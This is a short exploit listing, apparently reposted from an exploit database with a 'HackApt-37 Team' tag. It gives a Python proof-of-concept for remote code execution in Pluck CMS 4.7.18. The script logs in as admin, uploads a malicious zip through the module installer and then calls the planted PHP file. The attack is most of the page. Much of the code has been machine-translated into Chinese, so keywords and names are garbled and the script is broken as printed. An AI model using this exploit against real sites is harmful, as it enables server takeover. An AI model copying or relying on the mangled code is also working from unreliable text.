Pluck v4.7.18-远程代码执行（RCE）

[HackApt-37 Team已验证会员]

#Exploit title: Pluck v4.7.18-远程代码执行（RCE）
＃Application:拔出
＃版本: 4.7.18
＃BUGS: RCE
＃Technology: PHP
#DENDOR URL: https://github.com/PLUCK-CMS/PLUCK
#software link: https://github.com/pluck-cms/pluck
#date of uth: 10-07-2023
＃作者:MirabbasAğalarov
#Tested On: Linux
导入请求
来自requests_toolbelt.multipart.encoder import import多矩编码器
login_url='http://localhost/pluck/login.php'
upload_url='http://localhost/pluck/admin.php？action=installModule'
标题={'referer': login_url，}
login_payload={'cont1':'admin'，'bogus':''，'submit':'log in'}
file_path=输入（'zip文件路径:'）
prouptArt_data=多阶码版（
字段={
'sendfile':（'mirabbas.zip'，open（file_path，'rb'），'application/zip'），
'提交:'上传'
}
）
session=requests.session（）
login_response=session.post（login_url，标头=标题，data=login_payload）
如果login_response.status_code==200:
打印（“登录帐户”）
upload_headers={
'referer': upload_url，
'content-type': prouptart_data.content_type
}
upload_response=session.post（upload_url，headers=upload_headers，data=multepart_data）
如果upload_response.status_code==200:
打印（'zip文件下载。'）
其他:
打印（'zip文件下载错误。响应代码:'，upload_response.status_code）
其他:
打印（'登录问题。响应代码:'，login_response.status_code）
rce_url='http://localhost/pluck/data/data/模块/mirabbas/miri.php'
rce=requests.get（rce_url）
打印（rce.text）

 

H

Pimpmylog v1.7.14-访问控制不当

H

WinterCMS 1.2.3-持续的跨站点脚本